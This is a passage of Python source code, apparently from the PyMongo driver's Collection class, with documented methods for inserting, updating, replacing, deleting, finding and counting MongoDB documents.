>>> result = db.test.insert_one({'x': 1})
>>> result.inserted_id
ObjectId('54f112defba522406c9cc208')
>>> db.test.find_one({'x': 1})
{u'x': 1, u'_id': ObjectId('54f112defba522406c9cc208')}
:Parameters:
- `document`: The document to insert. Must be a mutable mapping
type. If the document does not have an _id field one will be
added automatically.
- `bypass_document_validation`: (optional) If ``True``, allows the
write to opt-out of document level validation. Default is
``False``.
- `session` (optional): a
:class:`~pymongo.client_session.ClientSession`.
:Returns:
- An instance of :class:`~pymongo.results.InsertOneResult`.
.. seealso:: :ref:`writes-and-ids`
.. note:: `bypass_document_validation` requires server version
**>= 3.2**
.. versionchanged:: 3.6
Added ``session`` parameter.
.. versionchanged:: 3.2
Added bypass_document_validation support
.. versionadded:: 3.0
"""
common.validate_is_document_type("document", document)
if not (isinstance(document, RawBSONDocument) or "_id" in document):
document["_id"] = ObjectId()
write_concern = self._write_concern_for(session)
return InsertOneResult(
self._insert(document,
write_concern=write_concern,
bypass_doc_val=bypass_document_validation,
session=session),
write_concern.acknowledged)
def insert_many(self, documents, ordered=True,
bypass_document_validation=False, session=None):
"""Insert an iterable of documents.
>>> db.test.count()
0
>>> result = db.test.insert_many([{'x': i} for i in range(2)])
>>> result.inserted_ids
[ObjectId('54f113fffba522406c9cc20e'), ObjectId('54f113fffba522406c9cc20f')]
>>> db.test.count()
2
:Parameters:
          - `documents`: An iterable of documents to insert.
- `ordered` (optional): If ``True`` (the default) documents will be
inserted on the server serially, in the order provided. If an error
occurs all remaining inserts are aborted. If ``False``, documents
will be inserted on the server in arbitrary order, possibly in
parallel, and all document inserts will be attempted.
- `bypass_document_validation`: (optional) If ``True``, allows the
write to opt-out of document level validation. Default is
``False``.
- `session` (optional): a
:class:`~pymongo.client_session.ClientSession`.
:Returns:
An instance of :class:`~pymongo.results.InsertManyResult`.
.. seealso:: :ref:`writes-and-ids`
.. note:: `bypass_document_validation` requires server version
**>= 3.2**
.. versionchanged:: 3.6
Added ``session`` parameter.
.. versionchanged:: 3.2
Added bypass_document_validation support
.. versionadded:: 3.0
"""
if not isinstance(documents, abc.Iterable) or not documents:
raise TypeError("documents must be a non-empty list")
inserted_ids = []
def gen():
"""A generator that validates documents and handles _ids."""
for document in documents:
common.validate_is_document_type("document", document)
if not isinstance(document, RawBSONDocument):
if "_id" not in document:
document["_id"] = ObjectId()
inserted_ids.append(document["_id"])
yield (message._INSERT, document)
write_concern = self._write_concern_for(session)
blk = _Bulk(self, ordered, bypass_document_validation)
blk.ops = [doc for doc in gen()]
blk.execute(write_concern, session=session)
return InsertManyResult(inserted_ids, write_concern.acknowledged)
def _update(self, sock_info, criteria, document, upsert=False,
check_keys=True, multi=False, manipulate=False,
write_concern=None, op_id=None, ordered=True,
bypass_doc_val=False, collation=None, array_filters=None,
session=None, retryable_write=False):
"""Internal update / replace helper."""
common.validate_boolean("upsert", upsert)
if manipulate:
document = self.__database._fix_incoming(document, self)
collation = validate_collation_or_none(collation)
write_concern = write_concern or self.write_concern
acknowledged = write_concern.acknowledged
update_doc = SON([('q', criteria),
('u', document),
('multi', multi),
('upsert', upsert)])
if collation is not None:
if sock_info.max_wire_version < 5:
raise ConfigurationError(
'Must be connected to MongoDB 3.4+ to use collations.')
elif not acknowledged:
raise ConfigurationError(
'Collation is unsupported for unacknowledged writes.')
else:
update_doc['collation'] = collation
if array_filters is not None:
if sock_info.max_wire_version < 6:
raise ConfigurationError(
'Must be connected to MongoDB 3.6+ to use array_filters.')
elif not acknowledged:
raise ConfigurationError(
'arrayFilters is unsupported for unacknowledged writes.')
else:
update_doc['arrayFilters'] = array_filters
command = SON([('update', self.name),
('ordered', ordered),
('updates', [update_doc])])
if not write_concern.is_server_default:
command['writeConcern'] = write_concern.document
if not sock_info.op_msg_enabled and not acknowledged:
# Legacy OP_UPDATE.
return self._legacy_write(
sock_info, 'update', command, op_id,
bypass_doc_val, message.update, self.__full_name, upsert,
multi, criteria, document, False, write_concern.document,
check_keys, self.__write_response_codec_options)
# Update command.
if bypass_doc_val and sock_info.max_wire_version >= 4:
command['bypassDocumentValidation'] = True
# The command result has to be published for APM unmodified
# so we make a shallow copy here before adding updatedExisting.
result = sock_info.command(
self.__database.name,
command,
write_concern=write_concern,
codec_options=self.__write_response_codec_options,
session=session,
client=self.__database.client,
retryable_write=retryable_write).copy()
_check_write_command_response(result)
# Add the updatedExisting field for compatibility.
if result.get('n') and 'upserted' not in result:
result['updatedExisting'] = True
else:
result['updatedExisting'] = False
# MongoDB >= 2.6.0 returns the upsert _id in an array
# element. Break it out for backward compatibility.
if 'upserted' in result:
result['upserted'] = result['upserted'][0]['_id']
if not acknowledged:
return None
return result
def _update_retryable(
self, criteria, document, upsert=False,
check_keys=True, multi=False, manipulate=False,
write_concern=None, op_id=None, ordered=True,
bypass_doc_val=False, collation=None, array_filters=None,
session=None):
"""Internal update / replace helper."""
def _update(session, sock_info, retryable_write):
return self._update(
sock_info, criteria, document, upsert=upsert,
check_keys=check_keys, multi=multi, manipulate=manipulate,
write_concern=write_concern, op_id=op_id, ordered=ordered,
bypass_doc_val=bypass_doc_val, collation=collation,
array_filters=array_filters, session=session,
retryable_write=retryable_write)
return self.__database.client._retryable_write(
(write_concern or self.write_concern).acknowledged and not multi,
_update, session)
def replace_one(self, filter, replacement, upsert=False,
bypass_document_validation=False, collation=None,
session=None):
"""Replace a single document matching the filter.
>>> for doc in db.test.find({}):
... print(doc)
...
{u'x': 1, u'_id': ObjectId('54f4c5befba5220aa4d6dee7')}
>>> result = db.test.replace_one({'x': 1}, {'y': 1})
>>> result.matched_count
1
>>> result.modified_count
1
>>> for doc in db.test.find({}):
... print(doc)
...
{u'y': 1, u'_id': ObjectId('54f4c5befba5220aa4d6dee7')}
The *upsert* option can be used to insert a new document if a matching
document does not exist.
>>> result = db.test.replace_one({'x': 1}, {'x': 1}, True)
>>> result.matched_count
0
>>> result.modified_count
0
>>> result.upserted_id
ObjectId('54f11e5c8891e756a6e1abd4')
>>> db.test.find_one({'x': 1})
{u'x': 1, u'_id': ObjectId('54f11e5c8891e756a6e1abd4')}
:Parameters:
- `filter`: A query that matches the document to replace.
- `replacement`: The new document.
- `upsert` (optional): If ``True``, perform an insert if no documents
match the filter.
- `bypass_document_validation`: (optional) If ``True``, allows the
write to opt-out of document level validation. Default is
``False``.
- `collation` (optional): An instance of
:class:`~pymongo.collation.Collation`. This option is only supported
on MongoDB 3.4 and above.
- `session` (optional): a
:class:`~pymongo.client_session.ClientSession`.
:Returns:
- An instance of :class:`~pymongo.results.UpdateResult`.
.. note:: `bypass_document_validation` requires server version
**>= 3.2**
.. versionchanged:: 3.6
Added ``session`` parameter.
.. versionchanged:: 3.4
Added the `collation` option.
.. versionchanged:: 3.2
Added bypass_document_validation support
.. versionadded:: 3.0
"""
common.validate_is_mapping("filter", filter)
common.validate_ok_for_replace(replacement)
write_concern = self._write_concern_for(session)
return UpdateResult(
self._update_retryable(
filter, replacement, upsert,
write_concern=write_concern,
bypass_doc_val=bypass_document_validation,
collation=collation, session=session),
write_concern.acknowledged)
def update_one(self, filter, update, upsert=False,
bypass_document_validation=False,
collation=None, array_filters=None, session=None):
"""Update a single document matching the filter.
>>> for doc in db.test.find():
... print(doc)
...
{u'x': 1, u'_id': 0}
{u'x': 1, u'_id': 1}
{u'x': 1, u'_id': 2}
>>> result = db.test.update_one({'x': 1}, {'$inc': {'x': 3}})
>>> result.matched_count
1
>>> result.modified_count
1
>>> for doc in db.test.find():
... print(doc)
...
{u'x': 4, u'_id': 0}
{u'x': 1, u'_id': 1}
{u'x': 1, u'_id': 2}
:Parameters:
- `filter`: A query that matches the document to update.
- `update`: The modifications to apply.
- `upsert` (optional): If ``True``, perform an insert if no documents
match the filter.
- `bypass_document_validation`: (optional) If ``True``, allows the
write to opt-out of document level validation. Default is
``False``.
- `collation` (optional): An instance of
:class:`~pymongo.collation.Collation`. This option is only supported
on MongoDB 3.4 and above.
- `array_filters` (optional): A list of filters specifying which
array elements an update should apply. Requires MongoDB 3.6+.
- `session` (optional): a
:class:`~pymongo.client_session.ClientSession`.
:Returns:
- An instance of :class:`~pymongo.results.UpdateResult`.
.. note:: `bypass_document_validation` requires server version
**>= 3.2**
.. versionchanged:: 3.6
Added the `array_filters` and ``session`` parameters.
.. versionchanged:: 3.4
Added the `collation` option.
.. versionchanged:: 3.2
Added bypass_document_validation support
.. versionadded:: 3.0
"""
common.validate_is_mapping("filter", filter)
common.validate_ok_for_update(update)
common.validate_list_or_none('array_filters', array_filters)
write_concern = self._write_concern_for(session)
return UpdateResult(
self._update_retryable(
filter, update, upsert, check_keys=False,
write_concern=write_concern,
bypass_doc_val=bypass_document_validation,
collation=collation, array_filters=array_filters,
session=session),
write_concern.acknowledged)
def update_many(self, filter, update, upsert=False, array_filters=None,
bypass_document_validation=False, collation=None,
session=None):
"""Update one or more documents that match the filter.
>>> for doc in db.test.find():
... print(doc)
...
{u'x': 1, u'_id': 0}
{u'x': 1, u'_id': 1}
{u'x': 1, u'_id': 2}
>>> result = db.test.update_many({'x': 1}, {'$inc': {'x': 3}})
>>> result.matched_count
3
>>> result.modified_count
3
>>> for doc in db.test.find():
... print(doc)
...
{u'x': 4, u'_id': 0}
{u'x': 4, u'_id': 1}
{u'x': 4, u'_id': 2}
:Parameters:
- `filter`: A query that matches the documents to update.
- `update`: The modifications to apply.
- `upsert` (optional): If ``True``, perform an insert if no documents
match the filter.
- `bypass_document_validation` (optional): If ``True``, allows the
write to opt-out of document level validation. Default is
``False``.
- `collation` (optional): An instance of
:class:`~pymongo.collation.Collation`. This option is only supported
on MongoDB 3.4 and above.
- `array_filters` (optional): A list of filters specifying which
array elements an update should apply. Requires MongoDB 3.6+.
- `session` (optional): a
:class:`~pymongo.client_session.ClientSession`.
:Returns:
- An instance of :class:`~pymongo.results.UpdateResult`.
.. note:: `bypass_document_validation` requires server version
**>= 3.2**
.. versionchanged:: 3.6
Added ``array_filters`` and ``session`` parameters.
.. versionchanged:: 3.4
Added the `collation` option.
.. versionchanged:: 3.2
Added bypass_document_validation support
.. versionadded:: 3.0
"""
common.validate_is_mapping("filter", filter)
common.validate_ok_for_update(update)
common.validate_list_or_none('array_filters', array_filters)
write_concern = self._write_concern_for(session)
return UpdateResult(
self._update_retryable(
filter, update, upsert, check_keys=False, multi=True,
write_concern=write_concern,
bypass_doc_val=bypass_document_validation,
collation=collation, array_filters=array_filters,
session=session),
write_concern.acknowledged)
def drop(self, session=None):
"""Alias for :meth:`~pymongo.database.Database.drop_collection`.
:Parameters:
- `session` (optional): a
:class:`~pymongo.client_session.ClientSession`.
The following two calls are equivalent:
>>> db.foo.drop()
>>> db.drop_collection("foo")
.. versionchanged:: 3.7
:meth:`drop` now respects this :class:`Collection`'s :attr:`write_concern`.
.. versionchanged:: 3.6
Added ``session`` parameter.
"""
dbo = self.__database.client.get_database(
self.__database.name,
self.codec_options,
self.read_preference,
self.write_concern,
self.read_concern)
dbo.drop_collection(self.__name, session=session)
def _delete(
self, sock_info, criteria, multi,
write_concern=None, op_id=None, ordered=True,
collation=None, session=None, retryable_write=False):
"""Internal delete helper."""
common.validate_is_mapping("filter", criteria)
write_concern = write_concern or self.write_concern
acknowledged = write_concern.acknowledged
delete_doc = SON([('q', criteria),
('limit', int(not multi))])
collation = validate_collation_or_none(collation)
if collation is not None:
if sock_info.max_wire_version < 5:
raise ConfigurationError(
'Must be connected to MongoDB 3.4+ to use collations.')
elif not acknowledged:
raise ConfigurationError(
'Collation is unsupported for unacknowledged writes.')
else:
delete_doc['collation'] = collation
command = SON([('delete', self.name),
('ordered', ordered),
('deletes', [delete_doc])])
if not write_concern.is_server_default:
command['writeConcern'] = write_concern.document
if not sock_info.op_msg_enabled and not acknowledged:
# Legacy OP_DELETE.
return self._legacy_write(
sock_info, 'delete', command, op_id,
False, message.delete, self.__full_name, criteria,
False, write_concern.document,
self.__write_response_codec_options,
int(not multi))
# Delete command.
result = sock_info.command(
self.__database.name,
command,
write_concern=write_concern,
codec_options=self.__write_response_codec_options,
session=session,
client=self.__database.client,
retryable_write=retryable_write)
_check_write_command_response(result)
return result
def _delete_retryable(
self, criteria, multi,
write_concern=None, op_id=None, ordered=True,
collation=None, session=None):
"""Internal delete helper."""
def _delete(session, sock_info, retryable_write):
return self._delete(
sock_info, criteria, multi,
write_concern=write_concern, op_id=op_id, ordered=ordered,
collation=collation, session=session,
retryable_write=retryable_write)
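# Deletes are retryable only when they are acknowledged and target a
# single document (multi=False); multi-document deletes never retry.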
return self.__database.client._retryable_write(
(write_concern or self.write_concern).acknowledged and not multi,
_delete, session)
def delete_one(self, filter, collation=None, session=None):
"""Delete a single document matching the filter.
>>> db.test.count({'x': 1})
3
>>> result = db.test.delete_one({'x': 1})
>>> result.deleted_count
1
>>> db.test.count({'x': 1})
2
:Parameters:
- `filter`: A query that matches the document to delete.
- `collation` (optional): An instance of
:class:`~pymongo.collation.Collation`. This option is only supported
on MongoDB 3.4 and above.
- `session` (optional): a
:class:`~pymongo.client_session.ClientSession`.
:Returns:
- An instance of :class:`~pymongo.results.DeleteResult`.
.. versionchanged:: 3.6
Added ``session`` parameter.
.. versionchanged:: 3.4
Added the `collation` option.
.. versionadded:: 3.0
"""
write_concern = self._write_concern_for(session)
return DeleteResult(
self._delete_retryable(
filter, False,
write_concern=write_concern,
collation=collation, session=session),
write_concern.acknowledged)
def delete_many(self, filter, collation=None, session=None):
"""Delete one or more documents matching the filter.
>>> db.test.count({'x': 1})
3
>>> result = db.test.delete_many({'x': 1})
>>> result.deleted_count
3
>>> db.test.count({'x': 1})
0
:Parameters:
- `filter`: A query that matches the documents to delete.
- `collation` (optional): An instance of
:class:`~pymongo.collation.Collation`. This option is only supported
on MongoDB 3.4 and above.
- `session` (optional): a
:class:`~pymongo.client_session.ClientSession`.
:Returns:
- An instance of :class:`~pymongo.results.DeleteResult`.
.. versionchanged:: 3.6
Added ``session`` parameter.
.. versionchanged:: 3.4
Added the `collation` option.
.. versionadded:: 3.0
"""
write_concern = self._write_concern_for(session)
return DeleteResult(
self._delete_retryable(
filter, True,
write_concern=write_concern,
collation=collation, session=session),
write_concern.acknowledged)
def find_one(self, filter=None, *args, **kwargs):
"""Get a single document from the database.
All arguments to :meth:`find` are also valid arguments for
:meth:`find_one`, although any `limit` argument will be
ignored. Returns a single document, or ``None`` if no matching
document is found.
The :meth:`find_one` method obeys the :attr:`read_preference` of
this :class:`Collection`.
:Parameters:
- `filter` (optional): a dictionary specifying
the query to be performed OR any other type to be used as
the value for a query for ``"_id"``.
- `*args` (optional): any additional positional arguments
are the same as the arguments to :meth:`find`.
- `**kwargs` (optional): any additional keyword arguments
are the same as the arguments to :meth:`find`.
>>> collection.find_one(max_time_ms=100)
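As another illustration, these two calls are equivalent ways to fetch
the document whose ``_id`` is ``0`` (the value is illustrative)::
>>> collection.find_one({'_id': 0})
>>> collection.find_one(0)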
"""
if (filter is not None and not
isinstance(filter, abc.Mapping)):
filter = {"_id": filter}
cursor = self.find(filter, *args, **kwargs)
for result in cursor.limit(-1):
return result
return None
def find(self, *args, **kwargs):
"""Query the database.
The `filter` argument is a prototype document that all results
must match. For example:
>>> db.test.find({"hello": "world"})
only matches documents that have a key "hello" with value
"world". Matches can have other keys *in addition* to
"hello". The `projection` argument is used to specify a subset
of fields that should be included in the result documents. By
limiting results to a certain subset of fields you can cut
down on network traffic and decoding time.
Raises :class:`TypeError` if any of the arguments are of
improper type. Returns an instance of
:class:`~pymongo.cursor.Cursor` corresponding to this query.
The :meth:`find` method obeys the :attr:`read_preference` of
this :class:`Collection`.
:Parameters:
- `filter` (optional): a SON object specifying elements which
must be present for a document to be included in the
result set
- `projection` (optional): a list of field names that should be
returned in the result set or a dict specifying the fields
to include or exclude. If `projection` is a list "_id" will
always be returned. Use a dict to exclude fields from
the result (e.g. projection={'_id': False}).
- `session` (optional): a
:class:`~pymongo.client_session.ClientSession`.
- `skip` (optional): the number of documents to omit (from
the start of the result set) when returning the results
- `limit` (optional): the maximum number of results to
return
- `no_cursor_timeout` (optional): if False (the default), any
returned cursor is closed by the server after 10 minutes of
inactivity. If set to True, the returned cursor will never
time out on the server. Care should be taken to ensure that
cursors with no_cursor_timeout turned on are properly closed.
- `cursor_type` (optional): the type of cursor to return. The valid
options are defined by :class:`~pymongo.cursor.CursorType`:
- :attr:`~pymongo.cursor.CursorType.NON_TAILABLE` - the result of
this find call will return a standard cursor over the result set.
- :attr:`~pymongo.cursor.CursorType.TAILABLE` - the result of this
find call will be a tailable cursor - tailable cursors are only
for use with capped collections. They are not closed when the
last data is retrieved but are kept open and the cursor location
marks the final document position. If more data is received
iteration of the cursor will continue from the last document
received. For details, see the `tailable cursor documentation
<http://www.mongodb.org/display/DOCS/Tailable+Cursors>`_.
- :attr:`~pymongo.cursor.CursorType.TAILABLE_AWAIT` - the result
of this find call will be a tailable cursor with the await flag
set. The server will wait for a few seconds after returning the
full result set so that it can capture and return additional data
added during the query.
- :attr:`~pymongo.cursor.CursorType.EXHAUST` - the result of this
find call will be an exhaust cursor. MongoDB will stream batched
results to the client without waiting for the client to request
each batch, reducing latency. See notes on compatibility below.
- `sort` (optional): a list of (key, direction) pairs
specifying the sort order for this query. See
:meth:`~pymongo.cursor.Cursor.sort` for details.
- `allow_partial_results` (optional): if True, mongos will return
partial results if some shards are down instead of returning an
error.
- `oplog_replay` (optional): If True, set the oplogReplay query
flag.
- `batch_size` (optional): Limits the number of documents returned in
a single batch.
- `manipulate` (optional): **DEPRECATED** - If True (the default),
apply any outgoing SON manipulators before returning.
- `collation` (optional): An instance of
:class:`~pymongo.collation.Collation`. This option is only supported
on MongoDB 3.4 and above.
- `return_key` (optional): If True, return only the index keys in
each document.
- `show_record_id` (optional): If True, adds a field ``$recordId`` in
each document with the storage engine's internal record identifier.
- `snapshot` (optional): **DEPRECATED** - If True, prevents the
cursor from returning a document more than once because of an
intervening write operation.
- `hint` (optional): An index, in the same format as passed to
:meth:`~pymongo.collection.Collection.create_index` (e.g.
``[('field', ASCENDING)]``). Pass this as an alternative to calling
:meth:`~pymongo.cursor.Cursor.hint` on the cursor to tell Mongo the
proper index to use for the query.
- `max_time_ms` (optional): Specifies a time limit for a query
operation. If the specified time is exceeded, the operation will be
aborted and :exc:`~pymongo.errors.ExecutionTimeout` is raised. Pass
this as an alternative to calling
:meth:`~pymongo.cursor.Cursor.max_time_ms` on the cursor.
- `max_scan` (optional): **DEPRECATED** - The maximum number of
documents to scan. Pass this as an alternative to calling
:meth:`~pymongo.cursor.Cursor.max_scan` on the cursor.
- `min` (optional): A list of field, limit pairs specifying the
inclusive lower bound for all keys of a specific index in order.
Pass this as an alternative to calling
:meth:`~pymongo.cursor.Cursor.min` on the cursor.
- `max` (optional): A list of field, limit pairs specifying the
exclusive upper bound for all keys of a specific index in order.
Pass this as an alternative to calling
:meth:`~pymongo.cursor.Cursor.max` on the cursor.
- `comment` (optional): A string or document. Pass this as an
alternative to calling :meth:`~pymongo.cursor.Cursor.comment` on the
cursor.
- `modifiers` (optional): **DEPRECATED** - A dict specifying
additional MongoDB query modifiers. Use the keyword arguments listed
above instead.
.. note:: There are a number of caveats to using
:attr:`~pymongo.cursor.CursorType.EXHAUST` as cursor_type:
- The `limit` option can not be used with an exhaust cursor.
- Exhaust cursors are not supported by mongos and can not be
used with a sharded cluster.
- A :class:`~pymongo.cursor.Cursor` instance created with the
:attr:`~pymongo.cursor.CursorType.EXHAUST` cursor_type requires an
exclusive :class:`~socket.socket` connection to MongoDB. If the
:class:`~pymongo.cursor.Cursor` is discarded without being
completely iterated the underlying :class:`~socket.socket`
connection will be closed and discarded without being returned to
the connection pool.
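An illustrative query combining several of the options above (the
collection and field names are hypothetical)::
>>> cursor = db.test.find({'x': {'$gt': 0}}, projection={'_id': False},
... sort=[('x', pymongo.DESCENDING)], limit=10)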
.. versionchanged:: 3.7
Deprecated the `snapshot` option, which is deprecated in MongoDB
3.6 and removed in MongoDB 4.0.
Deprecated the `max_scan` option. Support for this option is
deprecated in MongoDB 4.0. Use `max_time_ms` instead to limit server
side execution time.
.. versionchanged:: 3.6
Added ``session`` parameter.
.. versionchanged:: 3.5
Added the options `return_key`, `show_record_id`, `snapshot`,
`hint`, `max_time_ms`, `max_scan`, `min`, `max`, and `comment`.
Deprecated the option `modifiers`.
.. versionchanged:: 3.4
Support the `collation` option.
.. versionchanged:: 3.0
Changed the parameter names `spec`, `fields`, `timeout`, and
`partial` to `filter`, `projection`, `no_cursor_timeout`, and
`allow_partial_results` respectively.
Added the `cursor_type`, `oplog_replay`, and `modifiers` options.
Removed the `network_timeout`, `read_preference`, `tag_sets`,
`secondary_acceptable_latency_ms`, `max_scan`, `snapshot`,
`tailable`, `await_data`, `exhaust`, `as_class`, and `slave_okay`
parameters. Removed `compile_re` option: PyMongo now always
represents BSON regular expressions as :class:`~bson.regex.Regex`
objects. Use :meth:`~bson.regex.Regex.try_compile` to attempt to
convert from a BSON regular expression to a Python regular
expression object. Soft deprecated the `manipulate` option.
.. versionchanged:: 2.7
Added `compile_re` option. If set to False, PyMongo represented BSON
regular expressions as :class:`~bson.regex.Regex` objects instead of
attempting to compile BSON regular expressions as Python native
regular expressions, thus preventing errors for some incompatible
patterns, see `PYTHON-500`_.
.. versionadded:: 2.3
The `tag_sets` and `secondary_acceptable_latency_ms` parameters.
.. _PYTHON-500: https://jira.mongodb.org/browse/PYTHON-500
.. mongodoc:: find
"""
return Cursor(self, *args, **kwargs)
def find_raw_batches(self, *args, **kwargs):
"""Query the database and retrieve batches of raw BSON.
Similar to the :meth:`find` method but returns a
:class:`~pymongo.cursor.RawBatchCursor`.
This example demonstrates how to work with raw batches, but in practice
raw batches should be passed to an external library that can decode
BSON into another data type, rather than used with PyMongo's
:mod:`bson` module.
>>> import bson
>>> cursor = db.test.find_raw_batches()
>>> for batch in cursor:
... print(bson.decode_all(batch))
.. note:: find_raw_batches does not support sessions.
.. versionadded:: 3.6
"""
# OP_MSG with document stream returns is required to support
# sessions.
if "session" in kwargs:
raise ConfigurationError(
"find_raw_batches does not support sessions")
return RawBatchCursor(self, *args, **kwargs)
def parallel_scan(self, num_cursors, session=None, **kwargs):
"""**DEPRECATED**: Scan this entire collection in parallel.
Returns a list of up to ``num_cursors`` cursors that can be iterated
concurrently. As long as the collection is not modified during
scanning, each document appears once in one of the cursors result
sets.
For example, to process each document in a collection using some
thread-safe ``process_document()`` function:
>>> def process_cursor(cursor):
... for document in cursor:
... # Some thread-safe processing function:
... process_document(document)
>>>
>>> # Get up to 4 cursors.
...
>>> cursors = collection.parallel_scan(4)
>>> threads = [
... threading.Thread(target=process_cursor, args=(cursor,))
... for cursor in cursors]
>>>
>>> for thread in threads:
... thread.start()
>>>
>>> for thread in threads:
... thread.join()
>>>
>>> # All documents have now been processed.
The :meth:`parallel_scan` method obeys the :attr:`read_preference` of
this :class:`Collection`.
:Parameters:
- `num_cursors`: the number of cursors to return
- `session` (optional): a
:class:`~pymongo.client_session.ClientSession`.
- `**kwargs`: additional options for the parallelCollectionScan
command can be passed as keyword arguments.
.. note:: Requires server version **>= 2.5.5**.
.. versionchanged:: 3.7
Deprecated.
.. versionchanged:: 3.6
Added ``session`` parameter.
.. versionchanged:: 3.4
Added back support for arbitrary keyword arguments. MongoDB 3.4
adds support for maxTimeMS as an option to the
parallelCollectionScan command.
.. versionchanged:: 3.0
Removed support for arbitrary keyword arguments, since
the parallelCollectionScan command has no optional arguments.
"""
warnings.warn("parallel_scan is deprecated. MongoDB 4.2 will remove "
"the parallelCollectionScan command.",
DeprecationWarning, stacklevel=2)
cmd = SON([('parallelCollectionScan', self.__name),
('numCursors', num_cursors)])
cmd.update(kwargs)
with self._socket_for_reads(session) as (sock_info, slave_ok):
# We call sock_info.command here directly, instead of
# calling self._command to avoid using an implicit session.
result = sock_info.command(
self.__database.name,
cmd,
slave_ok,
self._read_preference_for(session),
self.codec_options,
read_concern=self.read_concern,
parse_write_concern_error=True,
session=session,
client=self.__database.client)
cursors = []
for cursor in result['cursors']:
cursors.append(CommandCursor(
self, cursor['cursor'], sock_info.address,
session=session, explicit_session=session is not None))
return cursors
def _count(self, cmd, collation=None, session=None):
"""Internal count helper."""
with self._socket_for_reads(session) as (sock_info, slave_ok):
res = self._command(
sock_info,
cmd,
slave_ok,
allowable_errors=["ns missing"],
codec_options=self.__write_response_codec_options,
read_concern=self.read_concern,
collation=collation,
session=session)
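# "ns missing" means the collection does not exist yet, so report a
# count of zero rather than raising an error.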
if res.get("errmsg", "") == "ns missing":
return 0
return int(res["n"])
def _aggregate_one_result(
self, sock_info, slave_ok, cmd, collation=None, session=None):
"""Internal helper to run an aggregate that returns a single result."""
result = self._command(
sock_info,
cmd,
slave_ok,
codec_options=self.__write_response_codec_options,
read_concern=self.read_concern,
collation=collation,
session=session)
batch = result['cursor']['firstBatch']
return batch[0] if batch else None
def estimated_document_count(self, **kwargs):
"""Get an estimate of the number of documents in this collection using
collection metadata.
The :meth:`estimated_document_count` method is **not** supported in a
transaction.
All optional parameters should be passed as keyword arguments
to this method. Valid options include:
- `maxTimeMS` (int): The maximum amount of time to allow this
operation to run, in milliseconds.
:Parameters:
- `**kwargs` (optional): See list of options above.
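A minimal illustrative call, bounding server execution time via the
``maxTimeMS`` option (the ``db.test`` collection is hypothetical)::
>>> db.test.estimated_document_count(maxTimeMS=1000)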
.. versionadded:: 3.7
"""
if 'session' in kwargs:
raise ConfigurationError(
'estimated_document_count does not support sessions')
cmd = SON([('count', self.__name)])
cmd.update(kwargs)
return self._count(cmd)
def count_documents(self, filter, session=None, **kwargs):
"""Count the number of documents in this collection.
The :meth:`count_documents` method is supported in a transaction.
All optional parameters should be passed as keyword arguments
to this method. Valid options include:
- `skip` (int): The number of matching documents to skip before
returning results.
- `limit` (int): The maximum number of documents to count.
- `maxTimeMS` (int): The maximum amount of time to allow this
operation to run, in milliseconds.
- `collation` (optional): An instance of
:class:`~pymongo.collation.Collation`. This option is only supported
on MongoDB 3.4 and above.
- `hint` (string or list of tuples): The index to use. Specify either
the index name as a string or the index specification as a list of
tuples (e.g. [('a', pymongo.ASCENDING), ('b', pymongo.ASCENDING)]).
This option is only supported on MongoDB 3.6 and above.
The :meth:`count_documents` method obeys the :attr:`read_preference` of
this :class:`Collection`.
.. note:: When migrating from :meth:`count` to :meth:`count_documents`
the following query operators must be replaced:
+-------------+-------------------------------------+
| Operator | Replacement |
+=============+=====================================+
| $where | `$expr`_ |
+-------------+-------------------------------------+
| $near | `$geoWithin`_ with `$center`_ |
+-------------+-------------------------------------+
| $nearSphere | `$geoWithin`_ with `$centerSphere`_ |
+-------------+-------------------------------------+
$expr requires MongoDB 3.6+
:Parameters:
- `filter` (required): A query document that selects which documents
to count in the collection. Can be an empty document to count all
documents.
- `session` (optional): a
:class:`~pymongo.client_session.ClientSession`.
- `**kwargs` (optional): See list of options above.
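For example, to count at most 100 documents matching ``{'x': 1}``
after skipping the first 10 (values are purely illustrative)::
>>> db.test.count_documents({'x': 1}, skip=10, limit=100)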
.. versionadded:: 3.7
.. _$expr: https://docs.mongodb.com/manual/reference/operator/query/expr/
.. _$geoWithin: https://docs.mongodb.com/manual/reference/operator/query/geoWithin/
.. _$center: https://docs.mongodb.com/manual/reference/operator/query/center/#op._S_center
.. _$centerSphere: https://docs.mongodb.com/manual/reference/operator/query/centerSphere/#op._S_centerSphere
"""
pipeline = [{'$match': filter}]
if 'skip' in kwargs:
pipeline.append({'$skip': kwargs.pop('skip')})
if 'limit' in kwargs:
pipeline.append({'$limit': kwargs.pop('limit')})
pipeline.append({'$group': {'_id': None, 'n': {'$sum': 1}}})
cmd = SON([('aggregate', self.__name),
('pipeline', pipeline),
('cursor', {})])
if "hint" in kwargs and not isinstance(kwargs["hint"], string_type):
kwargs["hint"] = helpers._index_document(kwargs["hint"])
collation = validate_collation_or_none(kwargs.pop('collation', None))
cmd.update(kwargs)
with self._socket_for_reads(session) as (sock_info, slave_ok):
result = self._aggregate_one_result(
sock_info, slave_ok, cmd, collation, session)
if not result:
return 0
return result['n']
def count(self, filter=None, session=None, **kwargs):
"""**DEPRECATED** - Get the number of documents in this collection.
The :meth:`count` method is deprecated and **not** supported in a
transaction. Please use :meth:`count_documents` or
:meth:`estimated_document_count` instead.
All optional count parameters should be passed as keyword arguments
to this method. Valid options include:
- `skip` (int): The number of matching documents to skip before
returning results.
- `limit` (int): The maximum number of documents to count.
- `maxTimeMS` (int): The maximum amount of time to allow the count
command to run, in milliseconds.
- `collation` (optional): An instance of
:class:`~pymongo.collation.Collation`. This option is only supported
on MongoDB 3.4 and above.
- `hint` (string or list of tuples): The index to use. Specify either
the index name as a string or the index specification as a list of
tuples (e.g. [('a', pymongo.ASCENDING), ('b', pymongo.ASCENDING)]).
The :meth:`count` method obeys the :attr:`read_preference` of
this :class:`Collection`.
.. note:: When migrating from :meth:`count` to :meth:`count_documents`
the following query operators must be replaced:
+-------------+-------------------------------------+
| Operator | Replacement |
+=============+=====================================+
| $where | `$expr`_ |
+-------------+-------------------------------------+
| $near | `$geoWithin`_ with `$center`_ |
+-------------+-------------------------------------+
| $nearSphere | `$geoWithin`_ with `$centerSphere`_ |
+-------------+-------------------------------------+
$expr requires MongoDB 3.6+
:Parameters:
- `filter` (optional): A query document that selects which documents
to count in the collection.
- `session` (optional): a
:class:`~pymongo.client_session.ClientSession`.
- `**kwargs` (optional): See list of options above.
.. versionchanged:: 3.7
Deprecated.
.. versionchanged:: 3.6
Added ``session`` parameter.
.. versionchanged:: 3.4
Support the `collation` option.
.. _$expr: https://docs.mongodb.com/manual/reference/operator/query/expr/
.. _$geoWithin: https://docs.mongodb.com/manual/reference/operator/query/geoWithin/
